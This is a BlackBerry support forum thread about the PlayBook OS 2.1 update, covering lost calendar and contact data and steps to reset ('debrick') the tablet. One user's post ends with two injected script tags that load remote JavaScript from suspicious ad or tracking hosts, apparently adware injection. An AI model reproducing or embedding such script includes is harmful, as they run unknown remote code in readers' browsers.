Welcome!

Welcome to the official BlackBerry Support Community Forums.

This is your resource to discuss support topics with your peers, and learn from each other.

inside custom component

BlackBerry® PlayBook™

JSanders
Solutions: 5,930
My Device: Passport • Z30 • Z10 • Torch9850 • Playbook
My Carrier: Verizon

Re: OS 2.1.0.1032 is here

smrowe wrote:
I am not sure I understand. I can cancel or ignore what? Whether to do the update?

That doesn't answer my question about how the update version is determined.

Ah, gotcha. Sorry.

Yes, the upgrade size and included components will be vary according to your location (I guess determined by the IP address of your WiFi?) and the Country chosen in the setup.

1. If any post helps you please click the Like Button below the post(s) that helped you.
2. Please resolve your thread by marking the post "Solution?" which solved it for you!
3. Install free BlackBerry Protect today for backups of contacts and data.
4. Guide to Unlocking your BlackBerry & Unlock Codes

Join our BBM Channels (Beta)
BlackBerry Support Forums Channel
PIN: C0001B7B4   Display/Scan Bar Code
Knowledge Base Updates
PIN: C0005A9AA   Display/Scan Bar Code
Please use plain text.
Contributor
Shammah2001
My Device: Bold 9700

Re: New OS 2.1.0.1032 is available

The new software, does it have Arabic Keyboard???

Please use plain text.
JSanders

I don't think so, not that I have seen.

1. If any post helps you please click the Like Button below the post(s) that helped you.
2. Please resolve your thread by marking the post "Solution?" which solved it for you!

Knowledge Base Updates
Please use plain text.
New Contributor
climb45
My Device: Playbook

I have had terrible problems since the OS automatically updated.  Firstly, as with several other users, it completely wiped my calendar.  I restored from a backup but now the month view does not display properly (see http://supportforums.blackberry.com/t5/BlackBerry-PlayBook/Deleted-calendar/m-p/1941057#M47963 ).  Secondly attaching the device to the Desktop Software Manager is now so slow. 

I have been looking for a way of completely resetting the device, but cannot find appropriate instructions on the Blackberry website.  With most other companies I can send an email to their support departments to get help, but that doesn't seem to be an option with Blackberry unless I pay - I ony purchased my device at the end of July and yet my serial number is rejected as not qualifying for the 90 free support.

I bought a Blackberry thinking I would get a quality product from a respectable company.  My view is quickly changing!

Can anyone help me????

Please use plain text.
New Contributor
smrowe
My Device: 9930

Great, thank you.  I will wait until I return to the US to do the update, though reading through all the problems some people are having, I may wait for a later update.

I appreciate your help!

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Please use plain text.
Contributor
Roonster111
My Device: Playbook 32gb & Z30

Hi Climb45,

if what you are looking to do is a total scrub and start again with a "box fresh" playbook you need to do a process referred to as Debrickng.

You will find the official process elsewhere, but it's actually very straightforward.  Simply backup (if you want), disconnect from desk top manager (but leave DTM open), turn playbook off, when definitely off reconnect your PB to the cable, the redlightcomes on, a message appears on DTM click update and the rest is straight forward.  Note I have had an instance where I needed to do it a few times before it succeed but that was due to ISP problems.

Goodluck

Please use plain text.
JSanders

Roonster111 wrote:

Hi Climb45,

if what you are looking to do is a total scrub and start again with a "box fresh" playbook you need to do a process referred to as Debrickng.

You need to follow these instructions to "debrick" your PlayBook:
1. Do a backup of your PlayBook using your computer and BlackBerry Desktop Software version 7 installed. It can be downloaded from http://us.blackberry.com/apps-software/desktop/
2. After the backup is finished, unplug the PlayBook and on the PlayBook press and hold down the power button until the unit forces the device off.
3. With the Desktop Software still open on your computer and the PlayBook powered off, connect the PlayBook to your computer once again.
4. You should see an error screen from Desktop Software popup with the options to Retry, Update, or Cancel.
Very quickly choose the Update option.
5. All information will on your PlayBook will be erased and a reload of the Software will commence to install on the PlayBook.
6. Once this is complete your PlayBook will go back through the initial (as if new) setup wizard (entering the BlackBerryID, etc., and then you can perform a restore using Desktop Software to return your personal data from the backup. Applications which you downloaded from AppWorld won't restore, but they can be easily reinstalled using AppWorld > MyWorld section of AppWorld.

Knowledge Base Updates
Please use plain text.
Trusted Contributor
BB4matt
My Device: Z30, Torch 9800, Playbook

I am curious what your links refer too.

Delaying the new OS update maybe a good idea if you have manually added info into the contact or calendar

lists. Doing a backup with DTM7.1 does not restore any PIM data you added yourself manually.

Only what is stored on an email server and is linked and synced to your PlayBook, e.g. your contact list will be restored. DTM7.1 cannot make any PIM data backups for the Playbook even so it can do it for a BB phone.

This is well known I was told today. Is it? So your PIM data backup file is safe and unhackable on your PC because it is empty!

This posting is for those people which have not linked their contact or calendar lists to an email server.

Be aware you might loose this data if you don’t deal with it upfront.

Please use plain text.
JSanders

BB4matt wrote:

Only what is stored on an email server and is linked and synced to your PlayBook, e.g. your contact list will be restored. DTM7.1 cannot make any PIM data backups for the Playbook even so it can do it for a BB phone.

True, is is a known bug in the OS 2.1.0.1078 upgrade process. There are many users this has affected.

BB4matt wrote:

I am curious what your links refer too.

What link, where? There are many in this thread.

Knowledge Base Updates
Please use plain text.
Trusted Contributor
BB4matt
My Device: Z30, Torch 9800, Playbook

Sorry JSanders, my last posting was actually a reply to New Contributor smrowe.

I clicked on his posting for 'Reply'  thinking only he gets this message. Apparently this is not the case. Wow! I did not know that.

Your last reply is top notch. I actually gave you a ‘like’ on your first listing in this thread because you highlighted ‘Improved Android Application Support’. As we all know the Playbook is currently the guinea pig for BB10 smart phone’s launch. My android apps work now a lot smoother with OS 2.1.0.1032. What works well on the Playbook will work well on a BB10 smart phone I guess.

Maybe RIM will have a great launch not only with their new  phone but also with a better and PlayBook tested user interface when BB10 launches. RIM is smart while they improve the Playbook they debug the new smart phone UI somewhat too (a 2 for 1 strategy I guess).

So while I went for the new OS update I lost my contact list (grrrr) which was not mentioned anywhere. So that was the reason for my posting above: a ‘Good to Know’ issue for some users because the DTM manual says incorrectly: “To restore all your smartphone data or tablet data, click All device data and settings.” which I did.

Like it?

Please use plain text.